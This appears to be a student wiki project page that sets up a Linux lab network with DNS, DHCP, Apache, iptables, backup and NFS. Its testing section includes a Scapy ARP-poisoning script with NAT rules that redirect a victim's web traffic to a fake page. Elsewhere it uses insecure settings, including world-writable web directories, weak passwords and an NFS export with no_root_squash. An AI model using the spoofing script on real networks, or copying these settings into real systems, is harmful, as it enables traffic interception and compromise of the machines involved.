Data Networking/Spring 2017/JXM

Motivation
As a network engineer, It's essential to understand and implement network configurations in Linux Operating System. This project aims to design a dynamic network solution using the Domain Name System Server (DNS), Dynamic Host Configuration Protocol Server (DHCP), Web Server, Firewall, Backup Server. The servers and clients will be able to automatically obtain IP addresses by DHCP Server and DNS Server. The clients will be able to get web pages from Web Server. In addition, Firewall and Backup Server will be added to provide a secure and robust network configurations for the company.

Team Members
Junhao Huang

Xinchen Zhang

Mayank Kashyap

Domain Name System
Domain Name System (DNS) is a hierarchical naming system for computers and services. It translates domain names to numerical IP addresses with different network protocols. A DNS name server stores the DNS records for a domain and replies the answers to its database. There are four most common types of records stored in DNS database:
 * 1) A and AAAA: IP addresses
 * NS: Name Server, hostname of the authoritative server
 * MX: SMTP mail exchangers, transfers electronic mail messages from one computer to anther and translates mail server to the its canonical name
 * 1) CANME: A Canonical Name Record is used to translate a domain name to the canonical domain.
 * 2) PTR: IP address to hostname translation

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on Bootstrap Protocol (BOOTP), a protocol with which DHCP shares many implementation details. DHCP allows hosts to obtain required TCP/IP configuration information from a DHCP server.

Why is DHCP required?

Every device on a TCP/IP-based network must have a unique unicast IP address to access the network and its resources. Without DHCP, IP addresses for new computers or computers that are moved from one subnet to another must be configured manually; IP addresses for computers that are removed from the network must be manually reclaimed. With DHCP, this entire process is automated and managed centrally. The DHCP server maintains a pool of IP addresses and leases an address to any DHCP-enabled client when it starts up on the network. Because the IP addresses are dynamic (leased) rather than static (permanently assigned), addresses no longer in use are automatically returned to the pool for reallocation. The network administrator establishes DHCP servers that maintain TCP/IP configuration information and provide address configuration to DHCP-enabled clients in the form of a lease offer. The DHCP server stores the configuration information in a database that includes: Valid TCP/IP configuration parameters for all clients on the network.

Valid IP addresses, maintained in a pool for assignment to clients, as well as excluded addresses.

Reserved IP addresses associated with particular DHCP clients. This allows consistent assignment of a single IP address to a single DHCP client.

The lease duration, or the length of time for which the IP address can be used before a lease renewal is required.

A DHCP-enabled client, upon accepting a lease offer, receives: A valid IP address for the subnet to which it is connecting.

Requested DHCP options, which are additional parameters that a DHCP server is configured to assign to clients. Some examples of DHCP options are Router (default gateway), DNS Servers, and DNS Domain Name. For a full list of DHCP options, see DHCP Tools and Options.

–2601:197:800:2EFA:B827:C938:5A64:EDBE (discuss) 02:52, 7 April 2017 (UTC)

Webserver
Storing, processing and delivering webpages to clients is the basic function of a web server, which means that web servers host webpages to clients.

Apache2 is quite popular among people who would like to make a web server in Linux. phpmyadmin is good for configuring a web server.

Firewall
Firewall is a kind of computer system which is used to protect the network from internet attack. It is a barrier to between a internal network and other outside network.

By setting some rules to the server we can accept all the service we want and block others to make our internal network safe from the potential dangers from the Internet.

Backup
In case of the damage of the web server, a backup server is used to store the file and data on a network. So that the file and data would not be missed after the web server gets some error.

Requirements

 * Configure a DNS server to resolve domain names and reverse domains
 * Configure a DHCP server to assign IPv4 and IPv6 addresses dynamically
 * Implement a web server to host a web page
 * Implement a backup server to automatically install the server files using SSH and a NFS server
 * Create a firewall to provide the security

DNS
Master DNS

Step1: Install the BIND9 DNS server: Step2: Change hostname and host files: Step3: Edit the name servers: Step4: Edit the forwarders: Step5: Edit forward and reverse zones: #Forward IPV4 Zone  zone "jjxm.com" { type master; file "/etc/bind/db.jjxm.com"; allow-transfer { 192.168.10.3; }; also-notify { 192.168.10.3; }; };

#Reverse Zone  zone "10.168.192.in-addr.arpa" { type master; file "/etc/bind/db.192";allow-transfer { 192.168.10.3; }; allow-transfer { 192.168.10.3; }; }; Step6: Create the zone files:  Step7: Restart the bind9

Slave DNS

Step1: Edit forward and reverse zones: #Forward IPV4 Zone  zone "jjxm.com" { type slave; file "/etc/bind/db.jjxm.com"; allow-transfer { 192.168.10.2; }; };

#Reverse Zone  zone "10.168.192.in-addr.arpa" { type slave; file "/etc/bind/db.192"; allow-transfer { 192.168.10.2; }; };

Step2: Restart the bind9

DHCP
To install DHCP server, open a new Ubuntu VM to serve as DHCP server for your network. Once configured, this server cannot access internet anymore because of changes in the domain name and name servers. We will be using ISC (Internet Systems Consortium) DHCP server in our project and below are the steps for installation:

Step 1: Install ISC's dhcp server in terminal: Step 2: Indicate the network interface "ens33" in the isc-dhcp-server file located in /etc/default/ and also enable IPv6 through editing "OPTIONS=-6" Step 3: Make edits and changes to the DHCP configuration file for IPv4 Step 4: Make changes to the virtual machine's interfaces by changing the interfaces file in /etc/network/ Step 5: Edit the resolve file Step 6: Enable IPv4 and IPv6 forwarding Step 7: Install radvd for IPv6 advertising using the following command Step 8: Configure dhcpd6.conf to add IPv6 address pool Step 9: Edit radvd configuration file Step 10: Restart the network interface (NOTE: THIS WILL DISABLE YOUR INTERNET CONNECTION IN THE VM) Step 11: Start the DHCP server for IPv4 and IPv6

Web server
Step 1: We need to use Apache to as our web server, so we install Apache first Command:

sudo apt-get update sudo apt-get install apache2

Step 2: Install PHP Command:

sudo apt-get install php

Step 3: Install MySQL, and set the password as“linux” Command:

sudo apt-get install mysql-server

Step 4: Check if mysql is working Command:

sudo netstat -tap | grep mysql tcp       0      0 localhost:mysql         *:*                     LISTEN      841/mysqld

Step 5: Install phpmyadmin, choose apache when installing, and also set the password as "linux" Command:

sudo apt-get install phpmyadmin

Step 6: To create the phpmyadmin like we have to use chmod command to change the authority of /var/www Command:

sudo chmod 777 /var/www

Step 7: Create the phpmyadmin link between /usr/share/phpmyadmin and /var/www/html, after that we can see there is a phpmyadmin file in /var/www/html Command:

sudo ln -s /usr/share/phpmyadmin /var/www/html

Step 8: Create a basic webpage “Index.htm”, and we can see a index.html file in /var/www/html

Step 9: Go into the configuration of apache2 and change the default webpage catalog “/var/www” to “/home/ttno1”, and there is no '/' after directory path Command:

sudo vi /etc/apache2/apache2.conf

Step 10: Go into the configuration of 000-default and change the default webpage catalog “/var/www/html” to “/home/ttno1” Command:

sudo vi /etc/apache2/sites-available/000-default.conf

Step 11: We need to restart the apache Command:

sudo /etc/init.d/apache2 restart

Step 11: Use the browser on another host to visit the web server with its IP address.

Firewall
Step 1: List the current rules in iptables, and if you never set up your server before, you should see:

Chain  INPUT (policy ACCEPT)

target    prot opt source               destination

Chain  FORWARD (policy ACCEPT)

target    prot opt source               destination

Chain  OUTPUT (policy ACCEPT)

target    prot opt source               destination

Command: sudo iptables –L

Step 2: To allow established sessions to get traffic

Command: sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT And if the command above does not work, try the following one:

Step 3: Set up SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN

Command: sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT

sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT

Step 4: To send network packets to let computers' serveics cummunicate with each other.

Command: sudo iptables -I INPUT 1 -i lo -j ACCEPT

Step 5: Accept all traffic on loopback interface

Command: sudo iptables -A INPUT -i lo -j ACCEPT

sudo iptables -A OUTPUT -o lo -j ACCEPT

Step 6: To establish outgoing connections

Command: sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Step 7: Set up from internal to external

Command: sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT

Step 8: To drop Invalid Packets

Command: sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Step 9: The function of deny ping

Command: sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT

Step 10: For each client we set up a 10 connection limit for them

Command: sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT

Step 11: To prevent HTTP flood

Command: sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT

Step 12: If there is a need of block an IP Address

Command: sudo iptables -I INPUT -s 192.168.10.134 -j DROP

Step 13: If you would like to cancel the block IP address

Command: sudo iptables -D INPUT -s 192.168.10.134 -j DROP

Step 14: Make permittion for VPN

Command: Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT

Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT

Sudo iptables –A INPUT –p esp –j ACCEPT

Step 15: Deny other settings

Command: sudo iptables –A INPUT –j DROP

Step 16: To preserve your IPTABLES rules upon reboot, install iptables-persistant

Command: sudo apt-get install iptables-persistent

Step 17: Once the rules are changed, run the following commands to save and reload them before and after reboot

Command: sudo netfilter-persistent save

sudo netfilter-persistent reload

Backup
Step1: We use rsync to set up backup server. Step 2: Then we install SSH on web server and backup server. Step3: Generate a rsa key Step4: We generate the keys to another host. Step5: Create a backup zip file on the master server: Step6: The files are zipped and compressed: Step7: The zip is transferred to the backup server Step8: Unzip the original files

DNS
Step1: Use "nslookup" command to lookup the DNS server for different hostnames.

Step2: Use "dig" command to check the DNS records and zone files.

Step3: Turn the master DNS off and check nslookup.

DHCP
Step 1: Use the following command to check the status of dhcp server Step 2: To check if DHCP is leasing out addresses and other updates like acknowledgments and requests, use the following command after connecting DHCP to client. The red text represents the errors. Step 3: Check output at client's and other hosts' end. If the hosts receive the addresses that were specified as static addresses by DHCP and if client receives an address in the range defined by DHCP, then our test procedure is successful.

Web Server
Step1: Turn on your web server.

Step2: Open a browser on a client and enter the IP address of the web server to check if we can get access to the webpage of the server.

Method 1
Ping client's IP address in the terminal of web server's ubuntu and it successes.

Ping web server's IP address in the terminal of client and it shows destination port unreachable.

Method 2
Step 1: Open a browser and enter the IP address of the web server in a client.

Step 2: Block the IP address of the client by adding a IPtable on the terminal of the web server.

Step 3: Refresh the webpage in the client side. And see if the webpage can be refreshed.

Step 4: Delete the IPtable to allow the client get access to web server.

Step 5: Try again to refresh the webpage in the client side.

Backup
Check the files after the set time in crontab.

 Integrated Testing 

ARP
Step 1: We use scapy and python to make our ARP Poinsoning, so we install scapy first. Command:

sudo apt-get install tcpdump python3-crypto ipython3 sudo apt install python-scapy sudo apt install sysv-rc-conf

Step 2: To be the superuser and get higher authority, we reset the root password. Command:

sudo passwd root

Step 3: Start iptables after reboot Command:

sudo sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding Command:

sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

Step 5: Configure Scapy arp poison Command:

scapy op=2 victim= '192.168.10.28' spoof= '192.168.10.1' mac='00:0c:29:73:56:67' arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac) send(arp) op =1 arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac) send(arp) send(arp,inter=2,count=1000)

Step 6: Make a fake web page Command:

/etc/init.d/apache2 start echo “HAHA U LOSE.” > /home/Mayank/index.htm

Step 7: Forward the traffic Command:

iptables -t nat --flush iptables --zero iptables -A FORWARD --in-interface ens33 -j ACCEPT iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 192.168.10.30

IPSec
IPSec can be configured in any two virtual machines. In our case, we are configuring IPSec between two Ubuntu VMs with IP addresses: 192.168.10.21 and 192.168.10.25.

Step 1: Install ipsec in the first host using the following command Step 2: Go to the ipsec.conf file at /etc/ to update the parameters Step 3: Configure the secrets file in both hosts Step 4: Use this command to restart the ipsec processes Step 5: Check the ipsec status

NFS
NFS-Server

Step 1: Inatall nfs-kernel-server Command: sudo apt-get install nfs-kernel-server sudo apt-get install rpcbind

Step 2: Make share folder Command: sudo mkdir /home/mayank/Desktop/nfs

Step 3: Edit configuration Command: sudo vim /etc/exports /home/mayank/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart service Command:

sudo service rpcbind restart restart sudo service restart nfs-kernel-server restart

Step 5: Test Command: showmount -e Export list for ubuntu: /home/mayank/Desktop/nfs *

NFS-Clients

Step 1: Inatall nfs-common for clients Command:

sudo apt-get install nfs-common sudo apt-get install rpcbind

Step 2: Make share folder Command:

mkdir /home/client1/Desktop/nfs

Step 3: Mount the share file Command:

sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs

Step 4: Mount this share file when turn on the client Command:

sudo vim /etc/rc.local sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs

Reference
2. https://help.ubuntu.com/community/BIND9ServerHowto

3. http://www.webopedia.com/TERM/B/backup_server.html

4. https://en.wikipedia.org/wiki/Domain_Name_System

5. https://askubuntu.com

6. https://wiki.strongswan.org

7. https://www.cisco.com

8. http://www.aviran.org/arp-poisoning-python-scapy/

9. https://help.ubuntu.com/community/IptablesHowTo